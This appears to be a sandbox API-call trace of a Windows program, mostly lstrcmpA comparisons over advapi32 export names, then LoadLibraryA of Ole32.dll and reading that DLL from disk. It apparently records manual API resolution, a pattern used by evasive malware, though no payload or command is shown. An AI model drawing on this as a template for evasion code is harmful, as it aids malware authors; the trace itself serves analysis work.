1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0253.734] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0253.735] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0253.736] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0253.737] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0253.738] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0253.738] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0253.739] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0253.739] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0253.740] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0253.741] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0253.742] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0253.742] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0253.742] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0253.742] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0254.241] GetProcessHeap () returned 0x4a0000 [0254.241] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d92010 | out: hHeap=0x4a0000) returned 1 [0254.248] GetProcessHeap () returned 0x4a0000 [0254.248] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9220 [0254.248] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0254.248] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0254.249] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0254.249] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0254.250] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0254.250] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0254.250] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0254.250] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0254.250] GetProcessHeap () returned 0x4a0000 [0254.250] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x142d00) returned 0x415a040 [0254.253] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0254.253] ReadFile (in: hFile=0x140, lpBuffer=0x415a040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x415a040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0254.471] CloseHandle (hObject=0x140) returned 1 [0254.471] lstrcmpA 